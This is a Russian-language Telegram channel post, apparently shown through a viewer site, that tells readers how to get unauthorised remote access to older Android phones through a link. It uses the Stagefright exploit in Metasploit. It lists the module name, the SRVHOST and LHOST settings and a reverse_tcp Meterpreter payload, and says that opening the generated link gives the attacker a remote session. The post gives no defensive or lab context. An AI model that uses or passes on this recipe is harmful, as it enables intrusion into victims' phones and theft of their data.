TGViewer
CODE RED CODE RED @coderedcom · 8.63K subscribers
Post #719 11.9K
​​Удаленный доступ к смартфону через ссылку

То что по ссылке можно реализовать несанкционированный удаленный доступ на ПК знают многие, но это же можно сделать и для смартфона на Android. Существует несколько подобных уязвимостей, одна из которых Stagefright. Она присутствует на относительно старых версиях Android, и эксплуатируется с помощью эксплоита в Metasploit.

Установка

Устанавливаем Kali Linux.

В случае если пакет Stagefright не предустановлен в Metasploit, скачиваем его и закидываем в папку с эксплоитами.

Использование

Открываем консоль командой


Далее подключаем сам эксплоит

 exploit/android/browser/stagefright_mp4_tx3g_64bit

Теперь нужно будет последовательно прописать необходимые параметры

 SRVHOST <ip>
◽️set URIPATH /
◽️set PAYLOAD linux/armle/mettle/reverse_tcp
◽️set LHOST <ip>
◽️set VERBOSE true

Остается только запустить скрипт

 -j

В окне появится ссылка, при переходе по которой откроется сессия для удаленного доступа.
More from @coderedcom
  1. Nov 29, 2022Понятная пятница в английском: скидка 10% на курсы для аналитиков и разработчиков. В англи…
  2. Nov 28, 2022​Ruby для романтиков Роман Пушкин Язык руби (ruby - англ.) и веб-программирование - это не…
  3. Nov 27, 2022​PowerShell для сисадминов Адам Бертрам PowerShell® — это одновременно язык сценариев и ко…
  4. Nov 26, 2022​Программирование на Clojure. Практика применения Lisp в мире Java Чаз Эмерик, Брайан Карп…
  5. Nov 25, 2022​Разработка приложений на языке Java Е.В. Кислицын, Е.И. Шишков В учебном пособии раскрыва…
  6. Nov 24, 2022​Сбор данных в Интернете на языке R Дмитрий Храмов Всё, что регистрирует человек и созданн…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →